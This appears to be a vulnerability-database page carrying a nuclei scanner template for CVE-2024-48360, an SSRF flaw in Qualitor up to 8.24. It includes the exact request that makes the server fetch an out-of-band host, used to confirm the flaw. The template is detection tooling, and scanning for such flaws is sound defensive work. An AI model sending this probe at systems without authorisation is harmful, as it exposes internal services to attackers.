Lucene search
K

Qualitor <= v8.24 - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Qualitor v8.24 contains a Server-Side Request Forgery (SSRF) via /request/viewValidacao.php. Severity: high

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-48360
31 Oct 202421:57
circl
CNNVD
Qualitor 安全漏洞
31 Oct 202400:00
cnnvd
CVE
CVE-2024-48360
31 Oct 202400:00
cve
Cvelist
CVE-2024-48360
31 Oct 202400:00
cvelist
GithubExploit
Exploit for Server-Side Request Forgery in Qualitor
30 Oct 202414:55
githubexploit
NVD
CVE-2024-48360
31 Oct 202420:15
nvd
OSV
CVE-2024-48360
31 Oct 202420:15
osv
Packet Storm
Qualitor 8.24 Server-Side Request Forgery
31 Oct 202400:00
packetstorm
Positive Technologies
PT-2024-33091 · Qualitor · Qualitor
31 Oct 202400:00
ptsecurity
RedhatCVE
CVE-2024-48360
23 May 202507:31
redhatcve
Rows per page
id: CVE-2024-48360

info:
  name: Qualitor <= v8.24 - Server-Side Request Forgery
  author: s4e-io
  severity: high
  description: |
    Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via SSRF, potentially accessing internal services.
  remediation: |
    Update Qualitor to a version later than 8.24 that patches the SSRF vulnerability.
  reference:
    - https://github.com/OpenXP-Research/CVE-2024-48360
    - https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48360
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-48360
    cwe-id: CWE-918
    epss-score: 0.03905
    epss-percentile: 0.89013
  metadata:
    verified: true
    max-request: 2
    vendor: qualitor
    product: qualitor
    fofa-query: icon_hash="-1217039701"
  tags: cve,cve2024,ssrf,qualitor,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "qualitor")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022058601992dd36aa3d3bfbee6a0955c13d1448a8d0f6de98e1cff24d6681ffab6c022100cd89b5a8f7a254e562d9ad83c39ef357b97ffd249969f2e65e1d88400997510a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.03905
SSVC
21